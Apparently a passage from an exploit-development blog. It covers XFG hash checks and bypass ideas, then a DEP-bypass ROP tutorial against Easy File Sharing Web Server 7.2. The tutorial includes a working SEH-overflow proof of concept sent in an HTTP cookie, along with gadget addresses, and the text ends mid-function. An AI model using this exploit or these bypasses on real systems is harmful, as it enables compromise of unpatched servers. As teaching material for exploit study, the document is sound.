This time, when the __guard_xfg_dispatch_icall_fptr function is dereferenced, a jump to the function ntdll!LdrpDispatchUserCallTargetXFG is performed.

Firstly, a bitwise OR of the XFG hash and 1 occurs, with the result placed in R10. In our case, this sets a bit in the XFG function hash.

Next, a test al, 0xf operation occurs, which performs a bitwise AND between the lower 8 bits of AX (AL) and 0xf.

As we can see from the image above, this sets the zero flag in our case. Additionally, now we have reached a possible jump within ntdll!LdrpDispatchUserCallTargetXFG

Since the zero flag has been set, we will NOT take the jump and instead move on to the next instruction, test ax, 0xFFF.

Stepping through test ax, 0xFFF, which will perform a bitwise AND with the lower 16 bits of EAX and 0xFFF, plus set the zero flag accordingly, we see that we have cleared the zero flag in the image below. This means the jump will not occur, and we continue to move deeper into the ntdll!LdrpDispatchUserCallTargetXFG function.

Finally, we land on the cmp instruction which compares the hash 8 bytes above RAX (our target function) with the hash preserved in R10.

The compare statement, because the values are equal, causes the zero flag to be set. This skips the next jump, and performs the final jump to our target function in RAX!
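The sequence of checks we just stepped through can be sketched in Python. This models only the instructions covered above; what the conditional jumps do when they are taken is outside what we walked through, so the sketch simply returns a label for each path. The `read_qword` callback, the labels, and the hash and address values are all assumptions for illustration.

```python
MASK64 = (1 << 64) - 1

def xfg_dispatch(rax, r10, read_qword):
    """Toy model of the checks described above. Returns a label for the path taken."""
    r10 = (r10 | 1) & MASK64            # or r10, 1
    if (rax & 0xF) != 0:                # test al, 0xf: zero flag clear, jump taken
        return "first jump taken"
    if (rax & 0xFFF) == 0:              # test ax, 0xFFF: zero flag set, jump taken
        return "second jump taken"
    if read_qword(rax - 8) != r10:      # cmp: hash 8 bytes above the target vs. R10
        return "hash mismatch"
    return "jmp rax"                    # all checks passed

# Hypothetical values: a call-site hash and a target with the hash
# (plus the extra low bit) stored 8 bytes above it.
call_site_hash = 0x8D952E0D365AA070
target = 0x7FF7DED41010
memory = {target - 8: call_site_hash | 1}

print(xfg_dispatch(target, call_site_hash, memory.get))   # jmp rax
print(xfg_dispatch(target, 0x1122334455667780, memory.get))  # hash mismatch
```

This also shows why the hash above the function already has the extra bit set: the dispatch function sets the same bit in R10 before comparing.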

This is how a function protected by XFG is checked! Let’s now edit our code a bit and explore XFG a bit more.

Let’s Keep Going!

Recall that an XFG hash is made up of a function’s return type and any parameters. Let’s update our code to invoke another function of a different type.

We have changed the protectMe2() function to a function that returns an integer and takes a parameter of the type integer. This is different than our void cfgTest() function. We also set a function pointer, int (*cfgTest2) equal to the int protectMe2() function in order to create a new XFG hash for a different function type (int in this case). Let’s recompile our program and disassemble it in IDA to see how the two functions may vary from an XFG perspective.

Very interesting! As we can see from the above image, there are two different hashes now. The hash for our original function has remained the same. However, the hash for the int protectMe2() function is very different, but the last 12 bits of each hash in hexadecimal is 870 in our case. This is interesting and may be worth noting.

Additionally, static and dynamic analysis both show that, even before any code has executed, the actual hash is already placed 8 bytes above each function. The hashes also already have an additional bit set, just as we saw last time.

Let’s take this opportunity to showcase why XFG is significantly stronger than CFG.

Let’s simulate an arbitrary write again by overwriting what Source!cfgTest1 points to with Source!protectMe2.

After simulating the arbitrary write, we pick up execution in ntdll!LdrpDispatchUserCallTargetXFG again. Stepping through a few instructions, we once again land on the cmp instruction which checks to see if the preserved XFG hash matches the current XFG hash.

As we can see below, the hashes do not match!

Since the hashes do not match, this will cause XFG to determine a function pointer has been overwritten with something it should not have been overwritten with - and causes a program crash. Even though the function pointer was overwritten by another function within the same bitmap - XFG still will crash the process.

Let’s examine another scenario, with two functions of the same return type - but not the same amount of parameters.

To achieve this, our code has been edited to the following.

As we can see from the above image, we are using all integer functions now. However, the int cfgTest() function has two more parameters than the int protectMe2() function. Let’s compile and perform some static analysis in IDA.

The only difference between the two functions protected by XFG is the amount of parameters that int cfgTest() has, and yet the hashes are TOTALLY different. From a defensive perspective, it seems like even very similar functions are viewed as “very different”.

Additionally, we notice that the last 12 bits of the int cfgTest() hash have become 371 in hexadecimal instead of the previously mentioned 871 value. This means that XFG hashes seem to be unique until the last 8 bits. This is indicative of the hash only being unique up until about 56 bits.

As a sanity check and for completeness sake, let’s see what happens when two identical functions are assigned an XFG hash.

OMG Samesies!

Here is an edited version of our code, with two identical functions.

Disassembling the functions in IDA, we can see that the hashes this time are identical.

Obviously, since the hashing process for an XFG hash takes a function prototype and hashes it, the two hashes are going to be the same. I would not call this a flaw at all, because it is obvious Microsoft knew this going in. However, I feel this is a nice win for Microsoft in terms of their overall CFI strategy because as David pointed out, this was very little overhead to the already existing CFG infrastructure.

However, from an adversarial standpoint - it must be said. XFG functions can be overwritten, so long as the function is basically an identical prototype of the original function.

Potential Bypasses?

As mentioned above, utilizing functions of identical prototypes generates identical XFG hashes. Knowing this, it seems as though it could be possible to overwrite a function with an identical function of the same prototype. This is SIGNIFICANTLY stronger than CFG in terms of what functions can actually be called.

Let’s talk about one more potential bypass.

As we know, functions protected by XFG have an XFG hash placed above them (8 bytes above to be more specific). What would happen, for instance, if we performed a function pointer overwrite and called into the middle of a function, like KERNELBASE!VirtualProtect?

As we can see from the above image, calling into the middle of this function shows us that these hex numbers are being interpreted as opcodes, not memory addresses. This means that if XFG checks if a function pointer is overwritten by KERNELBASE!VirtualProtect, it would load the address of this function into RAX per the usual routine for XFG/CFG function checks. Then, this address is dereferenced at an offset of negative 8 to perform the XFG check. When this dereference happens, since this address contains opcodes, the opcodes that are present when calling into the middle of the function will be used in the XFG check.

Let’s perform a function pointer overwrite.

Note that the machine was restarted in between screenshots, causing addresses to change (but the symbols will remain the same).

Next, let’s step through the XFG dispatch functions and reach the compare statement.

Hitting the compare statement, we can see that R10 contains the preserved XFG hash, while RAX just contains the address of KERNELBASE!VirtualProtect + 0x50.

Taking a look at RAX - 8, where the XFG check occurs, we can see that the opcodes that reside within KERNELBASE!VirtualProtect are being treated as the “compared hash”.
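To illustrate what "opcodes treated as the compared hash" means, here is a small Python sketch. The bytes are hypothetical instruction bytes, not taken from KERNELBASE!VirtualProtect, and the names `code`, `target_offset` and `compared_hash` are made up. The check simply reads the 8 bytes before the target as one little-endian 64-bit value, whatever they happen to be.

```python
import struct

# Hypothetical instruction bytes from somewhere inside a function.
code = bytes.fromhex("48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 90")

# Pretend the overwritten function pointer lands 8 bytes into this buffer.
target_offset = 8

# The XFG compare reads the qword at (target - 8), little-endian.
compared_hash = struct.unpack_from("<Q", code, target_offset - 8)[0]
print(hex(compared_hash))

# A made-up preserved hash from the call site (with the extra bit set).
preserved = 0x8D952E0D365AA071
print("match" if compared_hash == preserved else "no match")
```

Unless those 8 bytes happen to equal the preserved hash exactly, the compare fails.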

Although this compare will fail, this brings up an interesting point.

Since calling into the middle of a function results in the function’s data being treated as opcodes and not memory addresses (usually), it may be possible for an adversary to utilize an arbitrary read/write primitive to do the following.

  1. Locate the XFG hash for a function you want to overwrite
  2. Perform a loop to dereference the process space’s memory and look for patterns that are identical to the XFG hash (remember, we still have to abide by CFG’s rules and choose a function exported by the application or a function that is additionally located in the same bitmap)
  3. Overwrite the function pointer with any viable candidates
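Step 2 above amounts to a byte-pattern search. A minimal sketch in Python over a toy buffer follows, assuming the stored form of the hash has the low bit set as we saw earlier. The function name `find_hash_candidates`, the buffer contents, and the base address are hypothetical, and this ignores the CFG validity requirement from the list above.

```python
import struct

def find_hash_candidates(memory, base, xfg_hash):
    """Return every address whose preceding 8 bytes equal the stored hash."""
    needle = struct.pack("<Q", xfg_hash | 1)   # stored form has the low bit set
    hits = []
    pos = memory.find(needle)
    while pos != -1:
        hits.append(base + pos + 8)            # candidate target is 8 bytes past the match
        pos = memory.find(needle, pos + 1)
    return hits

# Toy "process memory": filler, one accidental match, more filler.
xfg_hash = 0x8D952E0D365AA070
memory = b"\x90" * 24 + struct.pack("<Q", xfg_hash | 1) + b"\xc3" * 8

print([hex(a) for a in find_hash_candidates(memory, 0x1000, xfg_hash)])
```

In a real process the search space is large and a match on all 64 bits is unlikely, which is the caveat described next.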

Although you most likely are going to be very hard pressed to find anything identical to the hash in terms of opcodes in the middle of a function AND additionally make whatever you find useful from an attacker’s perspective, this is still possible it seems.

Final Thoughts

I think personally that XFG is an awesome mitigation and I am excited to see how people get creative with the solution. However, until CET comes into play, overwriting return addresses on the stack seems like it will still be fair game. I think the combination of XFG and CET is going to be very interesting for exploitation in the future. I think XFG is a great and pretty creative mitigation. However, it has yet to be seen how it performs against Indirect Branch Tracking (IBT), which is CET’s forward-edge protection. All together, I think Microsoft has done a great thing with XFG by implementing it and not letting all of the work done with CFG go to waste.

As always! Peace, love, and positivity :-)

The Current State of Exploit Development, Part 2

20 August 2020 at 00:00

CrowdStrike Blog

Today I am very happy to have released my second blog for CrowdStrike! This blog, which builds off of my last one, talks about some additional mitigations like ACG, XFG, and VBS/HVCI which have made exploitation more expensive and time consuming. This blog rounds out the series and I hope you have found it useful! I learned a lot when I put this two part series together.

You can find the blog here. Enjoy!

The Current State of Exploit Development, Part 1

6 August 2020 at 00:00

CrowdStrike Blog

As you may or may not know, I work at CrowdStrike for my day job. I am also a part of the red team and do not do any official exploit development/vulnerability research. I wanted to address why binary exploits often aren’t as used anymore in typical red team toolkits and explain although the impact of a binary exploit, especially in the kernel, is far more effective than typical red team TTPs - is the return on investment worth it? I would love to see, personally, some red team research shift towards kernel exploits for local privilege escalation - which is often one of the more difficult parts of a penetration test. But is binary exploitation even worth it at this point for red team work? Let’s find out!

Enjoy! Part 1

Exploit Development: Playing ROP’em COP’em Robots with WriteProcessMemory()

11 July 2020 at 00:00

Introduction

The other day on Twitter, I received a very kind and flattering message about a previous post of mine on the topic of ROP. Thinking about this post, I recall utilizing VirtualProtect() and disabling ASLR system wide to bypass DEP. I also used an outdated debugger, Immunity Debugger at the time, and I wanted to expand on my previous work, with a little bit of a less documented ROP technique and WinDbg.

Why is ROP Important?

ROP/COP and other code reuse apparatuses are very important mitigation bypass techniques, due to their versatility. Binary exploit mitigations have come a long way since DEP. Notably, mitigations such as CFG, upcoming XFG, ACG, etc. have posed an increased threat to exploit writers as time has gone on. ROP still has been the “Swiss army knife” to keep binary exploits alive. ROP can result in arbitrary write and arbitrary read primitives - as we will see in the upcoming post. Additionally, data only attacks with the implementation of ACG have become crucial. It is possible to perform data only attacks, although expensive from a technical perspective, by writing payloads fully in ROP.

What This Blog Assumes and What This Blog ISN’T

If you are interested in a remote bypass of ASLR and a 64-bit version of bypassing DEP, I suggest reading a previous blog of mine on this topic (although, undoubtedly, there are better blogs on this subject).

This blog will not address ASLR or 64-bit exploitation (read my previous post if that is what you are looking for) - and will be utilizing non-ASLR compiled modules, as well as the x86 __stdcall calling convention (technically an “ASLR bypass”, but in my opinion only an information leak = true ASLR bypasses).

Why are these topics not being addressed? This post aims to focus on a different, less documented approach to executing code with ROP. As such, I find it useful to use the most basic, straightforward example to hopefully help the reader fully understand a concept. I am fully aware that it is 2020 and I am well aware mitigations such as CFG are more common. However, generally the last step in exploitation, no matter HOW many mitigations there are (unless you are performing a data only attack), is bypassing DEP (in user mode or kernel mode). This post aims to address the latter portion of the last sentiment - and expects the reader already has an ASLR bypass primitive and a way to pivot to the stack.

Expediting The Process

The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory corruption vulnerability as a result of an HTTP request.

The offset to SEH is 4063 bytes, and the stack pivot lands 2563 bytes into our buffer. Instead of using a pop <reg> pop <reg> ret sequence, as is normally done on a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This will take the stack, where it is currently not controlled by us, and change the address to an address on the stack that we control - and then return into it.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain
crash += struct.pack('<L', 0x90909090)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
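The PoC above is Python 2. As a sanity check of the buffer layout only, the offsets can be verified on their own with Python 3 bytes. This is a sketch with no networking, and the constant names are made up for illustration.

```python
import struct

PIVOT_LANDING = 2563   # where the stack pivot lands inside the buffer
SEH_OFFSET = 4063      # offset of the SEH overwrite
TOTAL_SIZE = 5000      # total size of the crash buffer

crash = b"\x90" * PIVOT_LANDING
crash += struct.pack("<L", 0x90909090)            # placeholder where the ROP chain begins
crash += b"\x41" * (SEH_OFFSET - len(crash))      # pad up to SEH
crash += struct.pack("<L", 0x10022869)            # stack pivot address, little-endian
crash += b"\x41" * (TOTAL_SIZE - len(crash))      # pad out to the total size

print(len(crash))                                  # total length
print(crash[SEH_OFFSET:SEH_OFFSET + 4].hex())      # bytes as they sit in memory
```

struct.pack('<L', ...) stores the least significant byte first, which is why the address appears byte-reversed in the buffer.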

Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp 0x10022869. After sending the exploit POC - we will need to view the contents of the exception handler with the WinDbg command !exchain.

As a breakpoint has already been set on the address inside of SEH, all that is needed to pass the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the stack.

As a point of note, we have about 980 bytes to work with.

The Call to WriteProcessMemory()

What is the goal of this method of bypassing DEP? The goal here is not to dynamically change permissions of memory to make it executable - but to instead write our shellcode, dynamically, to already executable memory.

As we know, when DEP is enabled, memory is either writable or executable - but not both at the same time. The previous sentiment about writing shellcode, via WriteProcessMemory(), to executable memory is a bit contradictory knowing this. If memory is executable, adhering to DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily marking memory pages as RWX while data is being written to a destination - even if that destination doesn’t have writable permissions. After the write succeeds, the memory is then marked again as execute only.

From an adversary’s perspective, this means something. Certain shellcodes employ encoding mechanisms to bypass character filtering. If this is the case, encoded shellcode which is dynamically written to execute only memory will fail when executed. This is due to the encoded shellcode needing to “write itself” over adjacent process memory to decode. Since pages are execute only, and we do not have the WriteProcessMemory() “pass” to write to execute only memory anymore, an access violation will occur. Something to definitely keep in mind.

Let’s take a look at the call to WriteProcessMemory() firstly, to help make sense of all of this (per Microsoft Docs)

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

Let’s break down the call to WriteProcessMemory() by taking a look at each function argument.

  1. HANDLE hProcess: According to Microsoft Docs, this parameter is a handle to the desired process in which a user wants to write to the process memory. A handle, without going too much into detail, is a “reference” or “index” to an object. Generally, a handle is used as a “proxy” of sorts to access an object (this is especially true in kernel mode, as user mode cannot directly access kernel mode objects). We will look at how to dynamically resolve this parameter with relative ease. Think of this as “don’t talk to me, talk to my assistant”, where the process is the “me” and the handle is the “assistant”.
  2. LPVOID lpBaseAddress: This parameter is a pointer to the base address in which a write is desired. For example, if the region of memory you would like to write to was 0x11223344 - 0x11223355, the argument passed to the function call would be 0x11223344.
  3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
  4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode + NOPs, if necessary, will be).
  5. SIZE_T *lpNumberOfBytesWritten: This parameter is similar to the VirtualProtect() parameter lpflOldProtect, which inherits the old permissions of modified memory. However, our parameter inherits the number of bytes written. This will need to be a memory address, within the process space, that is writable.

Preserving a Stack Address

One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually - each ROP gadget is appended with a ret instruction. ret, from a technical perspective, will take the value pointed to by RSP (or ESP in this case), which will be the next ROP gadget on the stack, and load it into RIP (EIP in this case). Since ROP must be performed on the stack, and due to the dynamic nature of the stack, the virtual memory addresses associated with the stack are also dynamic.
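The behavior of ret described above can be modeled in a few lines of Python. This is a toy sketch: the stack is a dictionary, the starting ESP value is hypothetical, and the two entries on the stack are simply the addresses that already appear in this post.

```python
def ret(regs, stack):
    """Model x86 `ret`: load the dword at ESP into EIP, then move ESP up by 4."""
    regs["eip"] = stack[regs["esp"]]
    regs["esp"] += 4

# Hypothetical stack contents: two consecutive entries of a chain.
regs = {"esp": 0x1000, "eip": 0}
stack = {0x1000: 0x61C05E8C, 0x1004: 0x10022869}

ret(regs, stack)
print(hex(regs["eip"]), hex(regs["esp"]))   # first entry is now in EIP
ret(regs, stack)
print(hex(regs["eip"]), hex(regs["esp"]))   # second entry is now in EIP
```

Each ret consumes the next address on the stack, which is why losing track of where the stack is means losing control of the chain.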

As seen below, when the stack pivot is successfully performed, the virtual address of the stack is 0x029a68dc.

Restarting the application and pivoting to the stack again, the virtual address of the stack is at 0x028068dc.

At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of each module, and their static nature - the stack still seems to change! Although the stack is dynamically being resolved to seemingly “random” and “volatile to the duration of the process” memory - there is a way around this. If we can use a ROP gadget, or set of gadgets, properly - we can dynamically store an address around the stack into a CPU register.

Let’s start our ROP chain by preserving an address near the current stack pointer.

As you may or may not know, the base pointer (EBP) points to the “bottom” of the current stack frame (we will refer to the current stack frame as “the stack”). This means that EBP should be relatively close to ESP. We can validate this in WinDbg by viewing the current state of the CPU registers after the stack pivot.

After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use rp++ by taking a look at my last ROP blog post) - a nice gadget resides in sqlite3.dll that can help us preserve the address of EBP into another “common” register, which has more useful ROP gadgets as we will see later on, such as EAX.

0x61c05e8c: xchg eax, ebp ; ret  ;  (1 found)

Replace the NOPs in the previous PoC script, under the “Begin ROP chain” comment, with the above address. After firing off the updated PoC, we land on our intended ROP gadget.

After executing the above gadget, EAX is now loaded with an address near the current stack.

Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.

Although EAX is relatively close to ESP - it is still a decent ways away. Currently, EAX (which now contains the old value of EBP) is 0xfec bytes away from ESP.

To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.

Why ESP + 0x38 instead of just ESP you ask? This is a “preparatory” procedure (manipulating EAX to contain the address of ESP + 0x38).

As we will see later on, we would like to preserve an address around ESP into another “common” register, ECX. ECX is a register that is used as a “counter” (although technically it is a general purpose register). This means that ECX generally is a part of some more useful ROP gadgets.

In order to do this, the stack will eventually need to be increased by 0x24 bytes to get the value (technically future value) of ESP into ECX, due to the nature of the ROP gadgets available within the process memory. A ROP gadget will inadvertently perform an add esp, 0x24, resulting in collateral damage to get what we need accomplished, accomplished. There will be 4 ROP gadgets (plus an additional DWORD that will be “popped” into a register), for a total of 0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp, 0x24 gadget is executed (0x38 - 0x24 = 0x14).

This is the reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24, because we will need 0x14 bytes worth of ROP gadgets between then and now. By the time the ROP gadgets before the add esp, 0x24 instruction are executed, the value in EAX will be ESP + 0x24. However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp, 0x24 instruction, EAX will contain a value of ESP + 0x10.
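The bookkeeping above is easy to double check with a few lines of Python. This is only a sketch of the arithmetic - the variable names are made up for illustration and are not part of the PoC.

```python
# Sketch of the offset bookkeeping described above (names are illustrative).
DWORD = 4

# pop ecx, the value it pops, sub eax/ecx, add ebp/eax and the mov ecx/eax gadget
dwords_before_add_esp = 5
bytes_consumed = dwords_before_add_esp * DWORD       # bytes ESP advances before add esp, 0x24

target_offset = 0x38                                 # offset from ESP loaded into EAX now
offset_at_add_esp = target_offset - bytes_consumed   # EAX relative to ESP at add esp, 0x24
too_small = 0x24 - bytes_consumed                    # what we would get by loading ESP + 0x24 now

print(hex(bytes_consumed))      # 0x14
print(hex(offset_at_add_esp))   # 0x24
print(hex(too_small))           # 0x10
```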

Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of ESP after the ESP + 0x38 stack manipulation occurs - we will prepare EAX in advance.

Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time being.

0x10018606: pop ecx ; ret  ;  (1 found)
0xffffefe0 (Value to be popped into ECX. This is the negative representation of the distance between the current value of EAX and ESP + 0x38).
0x1001283e: sub eax, ecx ; ret  ;  (1 found)

Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded 0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX will contain NULL bytes - which will kill our exploit. Instead, we will use the negative representation of numbers and perform subtraction in order to get around this problem.
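To make the NULL byte problem concrete, here is a small sketch using the 0x1024 example from above. The helper names (neg32, has_null_byte) and the sample EAX value are hypothetical and exist only for this illustration.

```python
import struct

def neg32(value):
    """Return the 32-bit two's complement (negative representation) of value."""
    return (-value) & 0xFFFFFFFF

def has_null_byte(value):
    """True if the little-endian DWORD encoding of value contains a 0x00 byte."""
    return b"\x00" in struct.pack('<L', value)

print(has_null_byte(0x1024))          # True  (0x00001024 contains NULL bytes)
print("0x%08x" % neg32(0x1024))       # 0xffffefdc
print(has_null_byte(neg32(0x1024)))   # False

# sub eax, ecx with ECX = -0x1024 behaves like add eax, 0x1024 (modulo 2**32)
eax = 0x0299F000                      # hypothetical register value
result = (eax - neg32(0x1024)) & 0xFFFFFFFF
print("0x%08x" % result)              # 0x029a0024
```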

After the aforementioned gadget of exchanging EBP and EAX, program execution hits the pop ecx gadget.

The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.

Program execution then transfers to the sub eax, ecx ROP gadget, which will place the difference into the EAX register.

This yields our desired result.

Note that 0xCCCCCCCC is denoted as a visual for where we hope our program execution resumes at after all of this craziness. Our goal is for when the last ret occurs, it returns into this DWORD.

The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do this for us.

0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave  ; ret  ;  (1 found)

This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur - which is meaningless because ECX and EAX already contain the same value - meaning this part of the gadget basically just serves as a “NOP” of sorts. ESP then gets raised by 0x24 bytes, which we can compensate for - so this isn’t an issue. pop ebx can be compensated for as well, but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution flow off.

leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.

mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.

We know that EAX currently contains our target address. We can also recall from earlier that EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes - the mov esp, ebp portion of leave would set ESP to that target address, which is ESP + 0x24 as measured when the gadget begins. Since the add esp, 0x24 instruction earlier in the gadget has already raised ESP by 0x24 by that point - leave effectively sets ESP to the value it already holds, which is what we want. The goal here is to keep ESP pointed at our controlled data, which consists of our ROP gadgets.

It is a bit of a mouthful and “mind bender” of sorts - so do not worry if it is hazy or confusing at the moment. Viewing this step by step in the debugger will help make sense of all of this.

Note, after each gadget - obviously the value of ESP changes. For completeness’ sake, until we hit the add esp, 0x24 gadget - we will refer to the “target” ESP + 0x38 address as ESP + 0x38 (even though the offset will technically shrink after each gadget is executed).

First, as mentioned above, we need to get the value in EAX into EBP to prepare for the leave instruction.

0x61c30547: add ebp, eax ; ret  ;  (1 found)

How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0, which doesn’t alter it in any way, and the result of the addition is placed into EBP - essentially “moving” the address into EBP.
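Before heading to the debugger, the whole sequence can be traced in a tiny model. This is a rough sketch and not an emulator: the stack base is a made-up address, the stack only holds the ten padding DWORDs and the next gadget from the PoC, and EBP is assumed to be 0 as described above.

```python
# Minimal model of: add ebp, eax ; ret   followed by
# mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret
STACK_BASE = 0x0299F000           # hypothetical stack address
NEXT_GADGET = 0x10015eb4          # add esp, 0x1c ; ret (next gadget in the PoC)
PADDING = 0x90909090

# Ten padding DWORDs followed by the next gadget, as laid out in the PoC.
stack = [PADDING] * 10 + [NEXT_GADGET]

def read_dword(addr):
    """Read a DWORD from the modeled stack."""
    return stack[(addr - STACK_BASE) // 4]

esp = STACK_BASE                  # ESP when the mov ecx, eax gadget starts
eax = esp + 0x24                  # prepared earlier by the sub eax, ecx gadget
ebp = 0                           # EBP is 0 after the earlier xchg eax, ebp

ebp = (ebp + eax) & 0xFFFFFFFF    # add ebp, eax -> EBP now holds EAX
ecx = eax                         # mov ecx, eax
eax = ecx                         # mov eax, ecx (no effect)
esp += 0x24                       # add esp, 0x24 -> ESP == EAX == ECX == EBP
ebx = read_dword(esp); esp += 4   # pop ebx
esp = ebp                         # leave, part 1: mov esp, ebp
ebp = read_dword(esp); esp += 4   # leave, part 2: pop ebp
eip = read_dword(esp); esp += 4   # ret

print("0x%08x" % eip)             # 0x10015eb4
```

In this model the ret lands on the next gadget while ECX and EAX both keep the stack address, which is the behavior we are after.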

Let’s step through all of this in WinDbg - to make things a bit more clear.

First, program execution reaches the add ebp, eax instruction.

EBP is currently set to 0 and EAX is set to ESP + 0x38.

Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.

After EBP is prepared, program execution reaches the next ROP gadget.

After stepping through the mov ecx, eax gadget - ECX and EAX are now both set to ESP + 0x38.

Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as ECX (which is already equal to EAX) is placed into EAX.

Taking a look at the stack now, we can see our padding to compensate for add esp, 0x24 and pop ebx in the addresses before 0xCCCCCCCC.

Program execution has also reached the add esp, 0x24 instruction.

Stepping through the instruction, the stack has been set to the same value as EAX, ECX, and EBP.

Then, pop ebx clears the last bit of “padding” on the stack.

After all of this has occurred, the leave instruction is loaded up for execution.

leave ; ret is executed, and the execution of our ROP chain resumes its course - all while preserving ESP into ECX and EAX!

WriteProcessMemory() Parameters

Recall that we are dealing with the x86 architecture, meaning function calls go through __stdcall instead of __fastcall. This means that instead of placing our function arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on - we can just simply place our parameters on the stack, as such.

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Let’s talk about where these parameters come from.

To “bypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t) - we can leverage the Import Address Table (IAT).

Whenever a program calls a Windows API function - it does not do so directly. A special table, within the process space, known as the IAT essentially contains pointers to each needed API function.

The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.

As is seen in the image above, the IAT just contains pointers to Windows API functions. Meaning each of these entries points to a Windows API function.

We have “the base address” of each module (in reality, each module is just not compiled with ASLR) - so that is no problem. However, the value that each of these entries points to (which is a Windows API function) will change upon reboot.

The way to get around this, would be to load one of these IAT entries into a register we control (such as ECX) and then perform a mov ecx, dword ptr [ecx] instruction - an arbitrary read.

This would extract whatever ECX points to (which is a Windows API function) and place it into ECX. Even though Windows will randomize the addresses of the API, we can still leverage the fact each IAT will always point to the same Windows API function (even if the address of the API changes) to make sure this is not a problem.

Although the IAT for this application doesn’t directly contain a function pointer to kernel32!WriteProcessMemory - it does contain pointers to other kernel32.dll functions, such as kernel32!WriteFileImplementation. We also know that the distance between each function within a DLL DOESN’T CHANGE. This means, the distance between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always remain the same for the current patch level and OS version.

This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.
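As a rough sketch of this idea: the pointer slot address below comes from the PoC, but the kernel32.dll base addresses and the two RVAs are made-up values purely for illustration. Real values depend on the OS version and patch level and would come from the debugger.

```python
POINTER_SLOT = 0x61c832e4   # slot from the PoC holding a pointer to WriteFileImplementation

# Hypothetical RVAs inside kernel32.dll (NOT real values).
RVA_WRITE_FILE_IMPL = 0x00011234
RVA_WRITE_PROCESS_MEMORY = 0x0003C5A0
DELTA = RVA_WRITE_PROCESS_MEMORY - RVA_WRITE_FILE_IMPL   # constant for a given kernel32.dll build

def resolve_wpm(memory):
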